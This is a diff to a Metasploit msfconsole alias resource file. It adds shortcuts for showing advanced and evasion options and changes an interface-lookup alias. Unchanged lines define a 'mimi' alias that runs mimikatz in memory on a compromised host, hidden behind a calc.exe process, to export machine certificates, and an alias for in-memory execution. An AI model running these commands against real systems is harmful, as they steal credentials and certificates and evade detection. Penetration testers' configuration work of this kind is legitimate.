--- a/msf/msfconsole_aliases.rc
+++ b/msf/msfconsole_aliases.rc
@@ -1,11 +1,15 @@
 load alias
 alias -f so show options
+alias -f sa show advanced
+alias -f se show evasion
+# this won't work untl multi-command is landed, but it will after
+# alias -f sall so;sa;se
 alias -f s sessions
 alias -f slv sessions -l -v
 alias -f sk sessions -k
 alias -f sK sessions -K
 alias -f j jobs -l -v
-# the one below just picks the interface starting with 172
-alias -f ip ifconfig | grep "inet 172" | cut -d " " -f 2
+# the one below just picks the interface starting with 192 and will break when multi-command is landed
+alias -f ip ifconfig | grep "inet 192" | cut -d " " -f 2
 alias -f mimi execute -H -i -c -m -d calc.exe -f mimikatz.exe -a "'crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" exit' 
 alias in_mem execute -H -i -c -m -d calc.exe -f
